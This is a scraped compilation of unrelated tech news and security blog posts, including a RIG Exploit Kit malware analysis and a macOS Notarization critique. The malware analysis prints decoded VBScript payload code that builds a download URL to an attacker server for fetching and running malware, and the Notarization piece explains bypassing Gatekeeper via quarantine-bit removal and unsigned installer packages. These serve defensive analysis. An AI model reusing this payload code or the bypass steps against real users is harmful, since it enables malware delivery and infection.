Hear how to build a billion-dollar SaaS company at TechCrunch Disrupt

There was a time when brick-and-mortar mom and pops framed their first $1 on the wall, but in the SaaS startup the equivalent milestone is $1 billion revenue run-rate.

Salesforce is the SaaS revenue king reporting $4 billion in revenue for its most recent quarterly report, and there are many other relatively new SaaS companies, such as WorkDay, ServiceNow and Atlassian, that have broken the $1 billion barrier.

This year at TechCrunch Disrupt (tickets here!), we welcome three people to the Extra Crunch stage who know first hand what it takes to join the billion dollar club.

Neeraj Agrawal, a partner at Battery Ventures and seasoned enterprise investor, presented his growth thesis in a widely read article for TechCrunch where he outlined the key milestones for a SaaS company to reach a billion dollars.

Whitney Bouck is COO at HelloSign, a startup that was sold to Dropbox in 2018 for $230 million. Bouck was also an executive at Box, guiding their enterprise business from 2011-2015. Prior to that she was at Documentum, which exited in 2003 to EMC for $1.7 billion.

Jyoti Bansal is currently co-founder & CEO of Harness. Previously, he was founder & CEO of AppDynamics, which Cisco acquired in 2017 for $3.7 billion. Bansal is also an investor as co-founder of venture capital firm Unusual Ventures.

The goal of this panel is to help you understand the tools and strategies that go into ramping to a billion in revenue and beyond. It requires a rare combination of good idea, product-market fit, culture and commitment. It also requires figuring out how to evolve the core idea and recover from inevitable mistakes — all while selling investors on your vision.

We’re amped for this conversation, and we can’t wait to see you there! Buy tickets to Disrupt SF here at an early-bird rate!

Did you know Extra Crunch annual members get 20% off all TechCrunch event tickets? Head over here to get your annual pass, and then email extracrunch@techcrunch.com to get your 20% discount. Please note that it can take up to 24 hours to issue the discount code.

( function() {
var func = function() {
var iframe = document.getElementById(‘wpcom-iframe-661cf9b1b8f85f5aae09b8946cafadba’)
if ( iframe ) {
iframe.onload = function() {
iframe.contentWindow.postMessage( {
‘msg_type’: ‘poll_size’,
‘frame_id’: ‘wpcom-iframe-661cf9b1b8f85f5aae09b8946cafadba’
}, “https://tcprotectedembed.com” );

// Autosize iframe
var funcSizeResponse = function( e ) {

var origin = document.createElement( ‘a’ );
origin.href = e.origin;

// Verify message origin
if ( ‘tcprotectedembed.com’ !== origin.host )

// Verify message is in a format we expect
if ( ‘object’ !== typeof e.data || undefined === e.data.msg_type )

switch ( e.data.msg_type ) {
case ‘poll_size:response’:
var iframe = document.getElementById( e.data._request.frame_id );

if ( iframe && ” === iframe.width )
iframe.width = ‘100%’;
if ( iframe && ” === iframe.height )
iframe.height = parseInt( e.data.height );


if ( ‘function’ === typeof window.addEventListener ) {
window.addEventListener( ‘message’, funcSizeResponse, false );
} else if ( ‘function’ === typeof window.attachEvent ) {
window.attachEvent( ‘onmessage’, funcSizeResponse );
if (document.readyState === ‘complete’) { func.apply(); /* compat for infinite scroll */ }
else if ( document.addEventListener ) { document.addEventListener( ‘DOMContentLoaded’, func, false ); }
else if ( document.attachEvent ) { document.attachEvent( ‘onreadystatechange’, func ); }
} )();

The Good, the Bad and the Ugly in Cybersecurity – Week 37

Image of The Good, The Bad & The Ugly in CyberSecurity

The Good

Good news for privacy advocates. Rising from the ashes of Mozilla’s twice reincarnated Test Pilot program is a new, privacy-centric, third attempt. First beta out of the door is a desktop extension offering the ‘Firefox Private Network’, aka a free (at least for the time being) VPN to keep your internet surfing away from prying eyes. Anything that helps protect user privacy is always a net good in our eyes.

image of firefox vpn

Following New Bedford’s lead last week, the 22 Texas local governments hit by ransomware last month have disappointed greedy hackers hoping for a $2.5 million payday. The state’s Department of Information Resources say that their coordinated Incident Response plan has been a “tremendous success” and that over half of the “impacted entities” are now operating normally. Tax payers, of course, still have to foot the bill for the state’s valiant recovery efforts, an unsavory fact that only underlines the necessity of having a solution in place to begin with that can detect and block ransomware before it gains a foothold.

The Bad

A newly-discovered Intel side-channel vulnerability allows attackers to send maliciously crafted packets to a target system and spy on encrypted SSH sessions in real-time. The vulnerability requires the victim to be running with RDMA (Remote Direct Memory Access) enabled. Dubbed ‘Network Cache Attack’, or NetCAT (not that netcat), attackers could exploit the flaw to conduct a keystroke timing analysis and predict the text being typed in the SSH session. The researchers estimate such an attack would have an 85% chance of correctly predicting the typed text. 

The Ugly

Chromebook users are being warned of a security vulnerability in the Chrome OS’ “built-in security key” feature. If you’ve never heard of it you can probably relax, but the experimental feature is supposed to act as a universal 2nd factor (U2F) security key. U2F security keys are intended to support 2FA by ensuring only someone with a particular physical device can access your accounts. Alas, Google dropped the ball on this one and it turns out that attackers that observe the signature produced by the U2F authenticator can break it to reveal the private key. With that, they could potentially sign in to users website accounts without needing access to the Chrome OS device itself.

image of chrome vulnerability alert

The vulnerability affects 70 different models of Chromebook, and users of the feature are urged to ensure they’re running Chrome OS version 75 or later (which includes an automatic firmware update). Full remediation isn’t pretty, however, and involves a number of steps, as detailed here.   

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Ten questions for 2020 presidential candidate John Delaney

In November 2020, America will go to the polls to vote in perhaps the most consequential election in a generation. The winner will lead the country amid great social, economic and ecological unrest. The 2020 election will be a referendum on both the current White House and the direction of the country at large.

Nearly 20 years into the young century, technology has become a pervasive element in all of our lives, and will continue to only grow more important. Whoever takes the oath of office in January 2021 will have to answer some difficult questions, raging from an impending climate disaster to concerns about job loss at the hands of robotics and automation.

Many of these questions are overlooked in day to day coverage of candidates and during debates. In order to better address the issues, TechCrunch staff has compiled a 10-part questionnaire across a wide range of tech-centric topics. The questions have been sent to national candidates, regardless of party. We will be publishing the answers as we receive them. Candidates are not required to answer all 10 in order for us to publish, but we will be noting which answers have been left blank.

First up is former Congressman John Delaney. Prior to being elected to Maryland’s 6th Congressional District, Delaney co-founded and led healthcare loan service Health Care Financial Partners (HCFP) and  commercial lender CapitalSource. He was elected to Congress in 2013, beating out a 10-term Republican incumbent. Rumored to be running against Maryland governor Larry Hogan for a 2018 bid, Delaney instead announced plans to run for president in 2020.

1. Which initiatives will you prioritize to limit humankind’s impact on climate and avoid potential climate catastrophe?

My $4 trillion Climate Plan will enable us to reach the goal of net zero emissions by 2050, which the IPCC says is the necessary target to avoid the worst effects of climate change. The centerpiece of my plan is a carbon-fee-and-dividend that will put a price on carbon emissions and return the money to the American people through a dividend. My plan also includes increased federal funding for renewable energy research, advanced nuclear technologies, direct air capture, a new Climate Corps program, and the construction of the Carbon Throughway, which would transport captured carbon from all over the country to the Permian Basin for reuse and permanent sequestration.

2. What is your plan to increase black and Latinx startup founders’ access to funding?

As a former entrepreneur who started two companies that went on to be publicly traded, I am a firm believer in the importance of entrepreneurship. To ensure people from all backgrounds have the support they need to start a new business, I will create nonprofit banks to serve economically distressed communities, launch a new SBIC program to help provide access to capital to minority entrepreneurs, and create a grant program to fund business incubators and accelerators at HBCUs. Additionally, I pledge to appoint an Entrepreneurship Czar who will be responsible for promoting entrepreneurship-friendly policies at all levels of government and encouraging entrepreneurship in rural and urban communities that have been left behind by venture capital investment.

3. Why do you think low-income students are underrepresented in STEM fields and how do you think the government can help fix that problem?

I think a major part of the problem is that schools serving low-income communities don’t have the resources they need to provide a quality STEM education to every student. To fix that, I have an education plan that will increase investment in STEM education and use Title I funding to eliminate the $23 billion annual funding gap between predominantly white and predominantly black school districts. To encourage students to continue their education after they graduate from high school and ensure every student learns the skills they need, my plan also provides two years of free in-state tuition and fees at a public university, community college, or technical school to everyone who completes one year of my mandatory national service program.

4. Do you plan on backing and rolling out paper-only ballots or paper-verified election machines? With many stakeholders in the private sector and the government, how do you aim to coordinate and achieve that?

Making sure that our elections are secure is vital, and I think using voting machines that create a voter-verified paper record could improve security and increase voters’ confidence in the integrity of our elections. To address other facets of the election security issue, I have proposed creating a Department of Cybersecurity to help protect our election systems, and while in Congress I introduced election security legislation to ensure that election vendors are solely owned and controlled by American citizens.

5. What, if any, federal regulation should be enacted for autonomous vehicles?

I was proud to be the founder of the Congressional Artificial Intelligence Caucus, a bipartisan group of lawmakers dedicated to understanding the impacts of advances in AI technology and educating other legislators so they have the knowledge they need to enact policies that ensure these innovations benefit Americans. We need to use the legislative process to have a real conversation involving experts and other stakeholders in order to develop a comprehensive set of regulations regarding autonomous vehicles, which should include standards that address data collection practices and other privacy issues as well as more fundamental questions about public safety.

6. How do you plan to achieve and maintain U.S. superiority in space, both in government programs and private industry?

Space exploration is tremendously important to me as a former Congressman from Maryland, the home of NASA’s Goddard Space Flight Center, major space research centers at the University of Maryland, and many companies that develop crucial aerospace technologies. As president, I will support the NASA budget and will continue to encourage innovation in the private sector.

7. Increased capital in startups founded by American entrepreneurs is a net positive, but should the U.S. allow its businesses to be part-owned by foreign governments, particularly the government of Saudi Arabia?

I am concerned that joint ventures between U.S. businesses and foreign governments, including state-owned enterprises, could facilitate the theft of intellectual property, potentially allowing foreign governments to benefit from taxpayer-funded research. We need to put in place greater protections that defend American innovation from theft.

8. Will U.S.-China technology decoupling harm or benefit U.S. innovation and why?

In general, I am in favor of international technology cooperation but in the case of China, it engages in predatory economic behavior and disregards international rules. Intellectual property theft has become a big problem for American businesses as China allows its companies to steal IP through joint ventures. In theory, U.S.-China collaboration could advance technology and innovation but without proper IP and economic protections, U.S.-China joint ventures and partnerships can be detrimental to the U.S.

9. How large a threat does automation represent to American jobs? Do you have a plan to help train low-skilled workers and otherwise offset job loss?

Automation could lead to the disruption of up to 54 million American jobs if we aren’t prepared and we don’t have the right policies. To help American workers transition to the high-tech, high-skill future economy, I am calling for a national AI strategy that will support public/private AI partnerships, develop a social contract with the communities that are negatively impacted by technology and globalization, and create updated education and job training programs that will help students and those currently in the workforce learn the skills they need.

To help provide jobs to displaced workers and drive economic growth in communities that suffer negative effects from automation, I have proposed a $2 trillion infrastructure plan that would create an infrastructure bank to facilitate state and local government investment, increase the Highway Trust Fund, create a Climate Infrastructure Fund, and create five new matching funds to support water infrastructure, school infrastructure, deferred maintenance projects, rural broadband, and infrastructure projects in disadvantaged communities in urban and rural areas. In addition, my proposed national service program will create new opportunities that allow young adults to learn new skills and gain valuable work experience. For example, my proposal includes a new national infrastructure apprenticeship program that will award a professional certificate proving mastery of particular skill sets for those who complete the program.

10. What steps will you take to restore net neutrality and assure internet users that their traffic and data are safe from manipulation by broadband providers?

I support the Save Net Neutrality Act to restore net neutrality, and I will appoint FCC commissioners who are committed to maintaining a fair and open internet. Additionally, I would work with Congress to update our digital privacy laws and regulations to protect consumers, especially children, from their data being collected without consent.

RIG Exploit Kit Chain Internals

The Zero2Hero malware course continues with Vitali Kremez explaining the RIG Exploit Kit and the infection chain internals that led to the Amadey Stealer and Clipboard Hijacker.


One of the active malware distribution vectors lately remain to be exploit kits via drive-by infections. Exploit kits (EK) have various components from landing page filtering and serving relevant browser exploit with the end goal of downloading and running various malware of choice on the victim host.


Exploit kits essentially experienced their heyday in 2012-2014 from the Blackhole Exploit Kit distribution to the Angler (XXX) Exploit Kit to their eventual demise. In many cases, some of the most high-profile sophisticated exploit kits disappeared due to the significant law enforcement operations, which led to the arrest of the main developer behind Blackhole EK operating under the alias “Paunch” as well as the Lurk cybercrime group takedown with the supposed arrest of “JP Morgan” in Russia.

In 2019, exploit kits are not as popular and effective as once they were possibly due to the lack of reliable exploit providers, underground economy of browser exploits, and lack of professionalized approach to exploit development. 

The recent exploit kits are leveraging known vulnerabilities with the openly available proof of concept (POC) on various file sharing websites and platforms. 

Some of the most popular remain to be Fallout Exploit Kit and RIG Exploit Kit with the monthly subscription prices ranging from $700 USD to $2,000 USD. The majority of the exploit kit clientele are Russian-speaking cybercrime malware distributors; moreover, the exploit kit administrators themselves routinely refuse to rent the EK to the English-language speakers.

Reversing RIG Exploit Kit Infection Chain Internals Leading to “Amadey” Stealer & Clipboard Hijacker

While analyzing the latest malvertising campaign leading to the RIG Exploit Kit (RigEK) serving Amadey stealer and clipboard hijacker malware. The RigEK leverages the so-called “gate,” which is a simple website that redirects victim traffic to the eventual RigEK landing, which ultimately leads to the malware deployment.

Reverse Engineering Steps:

(1) Obtain the RigEK traffic response from Fiddler.

(2) Debug the landing page in by setting up the breakpoint function return and copying the decoded exploit payload function.

(3) Observe the full decoded VBS code from RigEK’s CVE-2018-8174 function, which is almost an exact copy of the Github. “CVE-2018-8174” page.

In this matter, CVE-2018-8174 is also known as  “Windows VBScript Engine Remote Code Execution Vulnerability.” This exploit works based on predictability of memory allocation with the use-after-free (UAF) exploitable vulnerability.

image of RIG EX Use after free

(4) Observe the additional Flash exploit served “CVE-2018-4878” compiled with the attacker path “C:UsersLAPTOPDesktopflash_exfl2;;MainExp.as” via UAF.

image of flash exploit

(5) Finally, observe the malware drop from the RigEK leveraging the exploit.

The “CVE-2018-8174” exploit allows remote code execution and transfers control to the following decoded beatified command that downloads an encoded binary, decrypts, and runs the malware.

The shortened relevant function is as follows decoded with the key cNNN9ka:

Function getegeheteegegegege()
    strString = "http://188[.]225[.]38[.]230/?REDACTED=detonator&ZqRgBa=known&DfJxlEZfMVoIe=known&gbamqKD=criticized&euxSkuKQYdMrM=already&ykPInPSwC=everyone&ffhd3s=REDACTED&LICFHL=blackmail&HZVhikQO=known&REDACTED=known&CRaWMKEIj=strategy&QhEkGOZo=criticized&REDACTED=strategy&zjpIGBzNgKtU=golfer&t4gdfgf4=REDACTED&hyrfspovuyAMY=blackmail&REDACTED=referred&REDACTED"
    linkHex =""

    For i=1 To Len(strString)
        linkHex = linkHex + Hex(Asc(Mid(strString,i,1)))


    key = "cNNN9ka"

    linkHex2 =""
    For i=1 To Len(key)
        linkHex2 = linkHex2 + Hex(Asc(Mid(key,i,1)))

    slang = "22"
    sla = "20"
    nulla = "00000000"

    str = "E"+"" ... "+ linkHex2 + slang + sla + slang + linkHex + slang + sla + slang + "A4" + slang + nulla
End Function



Indicators of Compromise (IOCs):

Amadey Stealer (SHA-256): fdf7be93b386b9ed27785f605b9de023dc71e0b1b4ac5d34c60b076043083eb7)

Clipboard Hijacker (SHA-256): 23367aa96d6969d17dfa01dde3dd9ce7436be7dbfb7c585c8ead2af926872fb7)

RigEK Gate: bitcoinsmaker[.]site 

RigEK Server Landing: 188[.]225[.]38[.]230

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

IBM brings Cloud Foundry and Red Hat OpenShift together

At the Cloud Foundry Summit in The Hague, IBM today showcased its Cloud Foundry Enterprise Environment on Red Hat’s OpenShift container platform.

For the longest time, the open-source Cloud Foundry Platform-as-a-Service ecosystem and Red Hat’s Kubernetes-centric OpenShift were mostly seen as competitors, with both tools vying for enterprise customers who want to modernize their application development and delivery platforms. But a lot of things have changed in recent times. On the technical side, Cloud Foundry started adopting Kubernetes as an option for application deployments and as a way of containerizing and running Cloud Foundry itself.

On the business side, IBM’s acquisition of Red Hat has brought along some change, too. IBM long backed Cloud Foundry as a top-level foundation member, while Red Hat bet on its own platform instead. Now that the acquisition has closed, it’s maybe no surprise that IBM is working on bringing Cloud Foundry to Red Hat’s platform.

For now, this work is still officially still a technology experiment, but our understanding is that IBM plans to turn this into a fully supported project that will give Cloud Foundry users the option to deploy their application right to OpenShift, while OpenShift customers will be able to offer their developers the Cloud Foundry experience.

“It’s another proof point that these things really work well together,” Cloud Foundry Foundation CTO Chip Childers told me ahead of today’s announcement. “That’s the developer experience that the CF community brings and in the case of IBM, that’s a great commercialization story for them.”

While Cloud Foundry isn’t seeing the same hype as in some of its earlier years, it remains one of the most widely used development platforms in large enterprises. According to the Cloud Foundry Foundation’s latest user survey, the companies that are already using it continue to move more of their development work onto the platform and the according to the code analysis from source{d}, the project continues to see over 50,000 commits per month.

“As businesses navigate digital transformation and developers drive innovation across cloud native environments, one thing is very clear: they are turning to Cloud Foundry as a proven, agile, and flexible platform — not to mention fast — for building into the future,” said Abby Kearns, executive director at the Cloud Foundry Foundation. “The survey also underscores the anchor Cloud Foundry provides across the enterprise, enabling developers to build, support, and maximize emerging technologies.”image024

Also at this week’s Summit, Pivotal (which is in the process of being acquired by VMware) is launching the alpha version of the Pivotal Application Service (PAS) on Kubernetes, while Swisscom, an early Cloud Foundry backer, is launching a major update to its Cloud Foundry-based Application Cloud.

SmartDrive snaps up $90M for in-truck video telematics solutions for safety and fuel efficiency

Trucks and other large commercial vehicles are the biggest whales on the road today — are they also, by virtue of that size, some of the most dangerous and inefficient if they are driven badly. Today, a startup that has built a platform aimed at improving both of those areas has raised a large round of funding to continue fuelling (so to speak) its own growth: SmartDrive, a San Diego-based provider of video-based telematics and transportation insights, has snapped up a round of $90 million.

The company is not disclosing its valuation but according to PitchBook, it was last valued (in 2017) at $290 million, which would put the valuation now around $380 million. But given that the company has been growing well — it says that in the first half of this year, its contracted units were up 48%, while sales were up by 44% — that figure may well be higher. (We are asking.)

The funding comes at an interesting time for fleet management and the trucking industry. A lot of the big stories about automotive technology at the moment seem to be focused on autonomous vehicles for private usage, but that leaves a large — and largely legacy — market in the form of fleet management and commercial vehicles.

That’s not to say it’s been completely ignored, however. Bigger companies like Uber, Telsa and Volvo, and startups like Nikola and more are all building smarter trucks, and just yesterday Samsara, which makes an industrial IoT platform that works, in part, to provide fleet management to the trucking industry, raised $300 million on a $6.3 billion valuation.

The telematics market was estimated to be worth $25.5 billion in 2018 and is forecast to grow to some $98 billion by 2026.

The round was led by TPG Sixth Street Partners, a division of investment giant TPG (which backs the likes of Spotify and many others), which earlier this year was raising a $2 billion fund for growth-stage investments. Unnamed existing investors also participated. The company prior to this had raised $230 million, with other backers including Founders Fund, NewView Capital, Oak Investment Partners, Michelin and more. (NEA had also been an investor but has more recently sold its stake.)

SmartDrive has been around since 2005 and focuses on a couple of key areas. Tapping data from the many sensors that you have today in commercial vehicles, it builds up a picture of how specific truckers are handling their vehicles, from their control on tricky roads to what gears and speed they are using as they go up inclines, and how long they idle their engines. The resulting data is used both to provide a better picture to fleet managers of that performance, and to highlight specific areas where the trucker can improve his or her performance, and how.

Analytics and data provided to customers include multi-camera 360-degree views, extended recording and U-turn triggering, along with diagnostics on specific driver performance. The company claims that the information has led to more satisfaction among drivers and customers, with driver retention rates of 70% or higher and improvements to 9 miles per gallon (mpg) on trips, versus industry averages of 20% driver retention and 6 mpg.

“This is an exciting time at SmartDrive and in the transportation sector overall as adoption of video-based telematics continues to accelerate,” stated Steve Mitgang, SmartDrive CEO, in a statement. “Building on our pioneering video-based safety program, our vision of an open platform powering best-of-breed video, compliance and telematics applications is garnering significant traction across a diverse range of fleets given the benefits of choice, flexibility and a lower total cost of ownership. The investment from TPG Sixth Street Partners and our existing investors will fuel continued innovation in areas such as computer vision and AI, while also enhancing sales and marketing initiatives and further international expansion.”

The focus for SmartDrive seems to be on how drivers are doing in specific circumstances: it doesn’t seem to suggest whether there could have been better routes, or if better fleet management could have resulted in improved performance. (That could be one area where it grows, or fits into a bigger platform, however.)

“SmartDrive is a market leader in the large and expanding transportation safety and intelligence sector and we are pleased to be investing in a growing company led by such a talented team,” noted Bo Stanley, partner and co-head of the Capital Solutions business at TPG Sixth Street Partners, in a statement. “SmartDrive’s proprietary data analytics platform and strong subscriber base put it in a great position to continue to capitalize on its track record of innovation and the broader secular trend of higher demand for safer and smarter transportation.”

The mainframe business is alive and well, as IBM announces new z15

It’s easy to think about mainframes as some technology dinosaur, but the fact is these machines remain a key component of many large organizations’ computing strategies. Today, IBM announced the latest in their line of mainframe computers, the z15.

For starters, as you would probably expect, these are big and powerful machines capable of handling enormous workloads. For example, this baby can process up to 1 trillion web transactions a day and handle 2.4 million Docker containers, while offering unparalleled security to go with that performance. This includes the ability to encrypt data once, and it stays encrypted, even when it leaves the system, a huge advantage for companies with a hybrid strategy.

Speaking of which, you may recall that IBM bought Red Hat last year for $34 billion. That deal closed in July and the companies have been working to incorporate Red Hat technology across the IBM business including the z line of mainframes.

IBM announced last month that it was making OpenShift, Red Hat’s Kubernetes-based cloud-native tools, available on the mainframe running Linux. This should enable developers, who have been working on OpenShift on other systems, to move seamlessly to the mainframe without special training.

IBM sees the mainframe as a bridge for hybrid computing environments, offering a highly secure place for data that when combined with Red Hat’s tools, can enable companies to have a single control plane for applications and data wherever it lives.

While it could be tough to justify the cost of these machines in the age of cloud computing, Ray Wang, founder and principal analyst at Constellation Research, says it could be more cost-effective than the cloud for certain customers. “If you are a new customer, and currently in the cloud and develop on Linux, then in the long run the economics are there to be cheaper than public cloud if you have a lot of IO, and need to get to a high degree of encryption and security,” he said.

He added, “The main point is that if you are worried about being held hostage by public cloud vendors on pricing, in the long run the z is a cost-effective and secure option for owning compute power and working in a multi-cloud, hybrid cloud world.”

Companies like airlines and financial services companies continue to use mainframes, and while they need the power these massive machines provide, they need to do so in a more modern context. The z15 is designed to provide that link to the future, while giving these companies the power they need.

macOS Notarization: Security Hardening or Security Theater?

Earlier this year, Apple introduced a new security measure called ‘Notarization’ to complement their existing strategies like Gatekeeper, XProtect, and the Malware Removal Tool. It would be fair to say that there’s been a bit of confusion and not a little pushback from developers about this new security measure. In this post, we’ll look at what Notarization is, why Apple have introduced it, and why it’s proving controversial among developers. We’ll also address the most important question for macOS users: will Apple’s Notarization requirement make your Mac more secure from malware? Let’s find out.

image of notarization

What is Notarization?

That should be a simple question to answer, but as we’ll see, Apple have been shifting the ground on this and a lack of clarity over what Notarization is and what it requires has caused some upset among the developer community.

image of apple news

According to Apple, Notarization is a process whereby all 3rd party software distributed outside of the Mac App Store must be uploaded to Apple’s servers and checked for malware. If the software passes Apple’s malware scan check, its details are added to Apple’s database of “safe” or at least “allowed” software. Developers in return receive an electronic “ticket” which can be attached to the software by the developer when they distribute it. Where Notarization is not yet compulsory (i.e., macOS Mojave), Notarized apps present a slightly different warning from Gatekeeper than unnotarized apps, which supposedly tells users that the software they are about to launch has passed Apple’s checks.

Put like that, Notarization sounds good for both users and developers. Users get extra confidence that apps they download are malware-free, and developers get a way to show users that their apps are safe. Sounds great, but there’s been a few wrinkles not only in implementation but also in design that have, shall we say, upset the Apple cart.

Enter The Hardened Runtime…Or Not

When Apple first introduced Notarization as an optional requirement in Mojave 10.14.5, it laid out very clear rules about what developers would have to do. One of the requirements was that developers build their software using something called the Hardened Runtime. This requires developers to jump through a few hoops to ensure they won’t lose necessary functionality and is signified by a flag in the codesigning certificate which tells the OS to treat the executable somewhat like Apple’s own SIP-protected executables. The existence of the flag will prevent other processes (like a debugger or decompiler) from attaching to it, prevent code injection, DLL hijacking and several other things.

As explained in Howard Oakley’s postNotarization devalued?“, Apple later decided to encourage developers to have all their software uploaded and scanned by their Notary service, even software that would never be used on newer versions of macOS or which could not, for various reasons, be built with the new hardened runtime.

More recently, in yet a third change, Apple have temporarily dropped the stricter requirements that they originally insisted on.

image of third notarization change

In short, the only thing it now turns out that is required for Notarization is the malware check itself. There will be a fourth change in January 2020. At that time, Apple’s current intention is to revert back to the strict requirements initially announced.

Who’s Got A Ticket To Ride?

As mentioned above, when an application is successfully notarized, Apple also issues the developer with a “ticket” which they can then attach to their software prior to distribution. The ticket is basically there to take care of the situation when a user tries to launch a Notarized app but has no connection to the internet or Apple’s Notarization servers are down. The ticket says “No need to check, I’m notarized.” This obviously has great benefit to Apple, reducing the burden on their servers, but many developers have balked at the clumsy tooling and inevitable delay between building, notarizing and receiving the ticket. The delay is currently only around a few minutes when everything is working properly, but if it’s not, it’s possible that developers may be stuck in limbo waiting for Apple’s servers to respond.

If you’re running Mojave 10.14.5 or later and you have the Xcode Command Line tools installed, you can easily do a quick check of which apps are currently notarized and stapled with a ticket in your /Applications folder like this:

for i in /Applications/* ; do stapler validate "${i}"|grep -B 1 worked;done

image of checking for notarized apps

Tickets are, technically, optional. Developers don’t have to staple them to their software when they distribute their app, and doing so is cumbersome for automated workflows as indicated above. However, by not stapling the ticket, developers run the real risk that their app might fail to run on launch if the user’s device cannot connect to Apple’s servers at that time. Given that possibility, very few developers would consider that an “option” and feel forced into adjusting their workflow to accommodate Apple’s changes.

Why Did Apple Introduce Notarization?

Given the extra burden on developers, it’s worth stopping to reflect on why Apple are keen on the Notarization technology. The company recognizes the need for a ‘defense in depth’ strategy, and Notarization is ostensibly another layer of added security for end users. One might hope that Notarization is an attempt to stem the flood of adware, PUP (potentially unwanted programs) and PPI (pay-per-install) “badware” that has been afflicting macOS users for some time now. Apple have been struggling to keep up with revoking developer signatures, and XProtect and MRT tool are simply not built to recognize the simple, automated changes that rogue developers can use to make their software invisible to Apple’s tools. Since Notarization on the forthcoming Catalina and beyond will prevent the launch of any software that Apple has not already received a copy of, presumably Apple will be able to add to their Notarization malware scan more fine-grained signatures over time. In effect, Notarization should serve as a kind of ‘XProtect in the Cloud’ service, allowing Apple to refine their detections and knock out larger classes of unwanted software globally simply by refusing or revoking Notarization status.

Will Notarization Defeat Malware?

That sounds plausible, and worthy, but Apple have been historically unwilling to revoke the signatures of a number of developers who distribute PUPs and who manage to stay within the letter of the law while infuriating users. As far as out-and-out malware goes, the real test of whether Notarization will make any difference will depend on what exactly the “malware scan” involves. As ever with the Cupertino outfit, that remains opaque.

Interestingly, we’ve already seen malware authors adopting the hardened runtime themselves, although to what end it’s not clear.

image of malware with hardened runtime

It fails as an anti-analysis strategy since it’s a simple matter for researchers to bypass the hardened runtime flag. More likely, I suspect, is that malware authors have been testing Apple’s Notarization service to see where and how their creations are caught. Apple helpfully provides a full error log on failed Notarization requests which may be useful to that end, so it’s at least possible if not likely that bad actors will figure out through trial -and-error what they can get away with.

Moreover, while bundles, packages and disk images require Notarization, it remains the case that not all file formats can be notarized or stapled with a ticket. In particular, this new technology is not going to affect any malware that simply runs a script or stand-alone executable. Scripts are increasingly common in adware and malware installers like Shlayer. Although these face the usual Gatekeeper checks, they are not subject to Notarization.

image of player command

New Technology Bypassed By Old Tricks

A large part of why some developers feel that Notarization is more security theater rather than true security hardening is that while it requires the good guys to adapt to these new requirements, bad actors already have the tools and techniques they need to bypass Notarization checks.

As mentioned above, scripts and standalone binaries are not subject to Notarization, since Apple’s “stapling” technology cannot be applied to these. Notarization checks also only apply to quarantined and “gatekeepered” apps. As we’ve discussed before, the very simple bypass for all of Apple’s security technologies is simply to remove the quarantine bit.

Here’s a simple demonstration. In this example, I’ve chosen a free 3rd party application called “Slimjet.app”. I must stress I have absolutely no knowledge of this application and I am not suggesting there is anything wrong with it. I chose it because it was the first unnotarized application I came across on a 3rd party distribution site. If we download and try to install this application on a system where Notarization is enforced, Gatekeeper will block it because, although it is correctly codesigned, it is not notarized. So far so good.

image of unnotarized app

But there are (at least) two simple ways around this, both of which are old tricks. First, we can simply remove the quarantine bit with xattr. It is still the case that this can be done by a process – such as a malicious installer script – without elevating privileges. The app will now run without complaint from Gatekeeper.

image of slimjet browser

Second, we can build the app into an installer package with pkgbuild and use that to install the app without setting the quarantine bit.

pkgbuild --component /Volumes/FlashPeak Slimjet/FlashPeak Slimjet.app --install-location /Applications ~/Desktop/slimejet.pkg

Apple have said that installer packages signed with Developer IDs must also be notarized, but that does not stop us from creating an unsigned installer package with something like the code above and then using simple social engineering tricks to convince the user to right-click ‘open’ it.

If that strikes you as unlikely, reflect on the fact that we see infections on a daily basis for unsigned code that use this exact trick. Here, for example, is a malicious application on a disk image that helpfully provides the victim with simple images showing exactly what they should do to launch it:

image of malware installer

The proof that this is a tried-and-trusted technique lies in the simple fact that these kind of installers are rampant in the wild, and attackers don’t stick with unsuccessful strategies.

Notarization doesn’t raise the bar here for unsigned packages like the one we created above because the unsigned installer isn’t subject to a Notarization check. The app the package drops is, as we mentioned, free of the quarantine bit and so it too will not have to pass Notarization or any other Gatekeeper checks.


It’s hard to knock Apple for effort. They are clearly paying a lot of attention to security issues on macOS, but the Notarization requirements suffer the same flaw as other built-in technologies; namely, relying on the easily-removed and not always respected com.apple.quarantine bit. Meanwhile, developers and end users alike are being forced through a succession of hoops and dialogs. Given the simplicity of bypassing all this extra effort, don’t be surprised if Notarization makes very little impact on the current state of adware, PUPs and malware on macOS.

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

ScyllaDB takes on Amazon with new DynamoDB migration tool

There are a lot of open source databases out there, and ScyllaDB, a NoSQL variety, is looking to differentiate itself by attracting none other than Amazon users. Today, it announced a DynamoDB migration tool to help Amazon customers move to its product.

It’s a bold move, but Scylla, which has a free open source product along with paid versions, has always had a penchant for going after bigger players. It has had a tool to help move Cassandra users to ScyllaDB for some time.

CEO Dor Laor says DynamoDB customers can now also migrate existing code with little modification. “If you’re using DynamoDB today, you will still be using the same drivers and the same client code. In fact, you don’t need to modify your client code one bit. You just need to redirect access to a different IP address running Scylla,” Laor told TechCrunch.

He says that the reason customers would want to switch to Scylla is because it offers a faster and cheaper experience by utilizing the hardware more efficiently. That means companies can run the same workloads on fewer machines, and do it faster, which ultimately should translate to lower costs.

The company also announced a $25 million Series C extension led by Eight Roads Ventures. Existing investors Bessemer Venture Partners, Magma Venture Partners, Qualcomm Ventures and TLV Partners also participated. Scylla has raised a total of $60 million, according to the company.

The startup has been around for 6 years and customers include Comcast, GE, IBM and Samsung. Laor says that Comcast went from running Cassandra on 400 machines to running the same workloads with Scylla on just 60.

Laor is playing the long game in the database market, and it’s not about taking on Cassandra, DynamoDB or any other individual product. “Our main goal is to be the default NoSQL database where if someone has big data, real-time workloads, they’ll think about us first, and we will become the default.”

Explorium reveals $19.1M in total funding for machine learning data discovery platform

Explorium, a data discovery platform for machine learning models, received a couple of unannounced funding rounds over the last year — a $3.6 million seed round last September and a $15.5 million Series A round in March. Today, it made both of these rounds public.

The seed round was led by Emerge with participation of F2 Capital. The Series A was led by Zeev Ventures with participation from the seed investors. The total raised is $19.1 million.

The company founders, who have a data science background, found that it was problematic to find the right data to build a machine learning model. Like most good startup founders confronted with a problem, they decided to solve it themselves by building a data discovery platform for data scientists.

